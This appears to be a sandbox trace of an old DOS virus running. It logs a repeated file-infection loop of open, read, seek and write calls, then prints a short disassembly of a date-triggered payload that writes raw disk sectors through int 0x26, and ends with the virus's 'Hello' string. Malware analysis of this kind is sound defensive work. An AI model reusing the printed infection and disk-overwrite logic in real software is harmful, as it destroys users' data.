2018-12-25T12:03:04.143219258Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.144577964Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.147697954Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.148870496Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.151616514Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.153942947Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.161391358Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.164261493Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.171019112Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.177393239Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.17887758Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.181948212Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.183297202Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.186444842Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.189596636Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.197256937Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.199908994Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.206625198Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.2127464Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.213900613Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.216673386Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.218075752Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.225916623Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.228825655Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.236956358Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.239362078Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.246158019Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.252236436Z 66 PC: 12af0 | Move file pointer (See above)
2018-12-25T12:03:04.253320672Z 64 PC: 12aff | Write file or device (See above)
2018-12-25T12:03:04.256637587Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:03:04.257843849Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T12:03:04.260470887Z 64 PC: 12b24 | Write file or device (See above)
2018-12-25T12:03:04.263447056Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.271044242Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.273551483Z 61 PC: 12ad0 | Open file (See above)
2018-12-25T12:03:04.280208259Z 63 PC: 12ae1 | Read file or device (See above)
2018-12-25T12:03:04.282607726Z 62 PC: 12b28 | Close file (See above)
2018-12-25T12:03:04.284199222Z 79 PC: 12ac0 | Find next file (See above)
2018-12-25T12:03:04.286867484Z 26 PC: 12b33 | Set disk transfer address
2018-12-25T12:03:04.287843191Z 42 PC: 12b4a | Get date
0x12b4a: cmp dx, 0x71a
0x12b4e: jne 0x12b59
0x12b50: mov ah, 0x19
0x12b52: int 0x21
0x12b54: pop cx
0x12b55: xor dx, dx
0x12b57: int 0x26
0x12b59: mov ax, 0x100
0x12b5c: jmp ax
0x12b5e: sub ch, byte ptr [0x4f43]
0x12b62: dec bp
0x12b63: add bl, ch
0x12b65: pop cx
0x12b66: nop
0x12b67: dec ax
0x12b68: insb byte ptr es:[di], dx
0x12b6a: insb byte ptr es:[di], dx
0x12b6b: outsw dx, word ptr [si]
0x12b6c: and byte ptr [di], ch
0x12b6e: and byte ptr [bp + di + 0x6f], al
2018-12-25T12:03:04.289780867Z 25 PC: 12b54 | Get default drive
2018-12-25T12:03:04.29687733Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')